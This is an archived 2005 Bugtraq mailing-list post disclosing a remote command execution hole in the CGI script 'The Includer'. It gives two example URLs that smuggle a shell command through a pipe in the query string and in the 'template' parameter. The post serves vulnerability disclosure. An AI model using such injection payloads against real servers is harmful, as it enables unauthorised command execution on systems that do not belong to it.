Remote Command Execution

From: Francisco Alisson (dominusvis_at_click21.com.br)
Date: 03/07/05

  • Next message: Thierry Carrez: "[ GLSA 200503-11 ] ImageMagick: Filename handling vulnerability"
    Date: 7 Mar 2005 10:50:02 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    Remote Command Execution

    Script: The Includer ( www.smarterscripts.com/includer/ )

    Remote Command Execution on:

    Example I.: www.host-vulnerable.com/includer.cgi?|id|
    Example II.: www.host-vulnerable.com/includer.cgi?template=|id|

    Sorry if the bug is already posted ;)


  • Next message: Thierry Carrez: "[ GLSA 200503-11 ] ImageMagick: Filename handling vulnerability"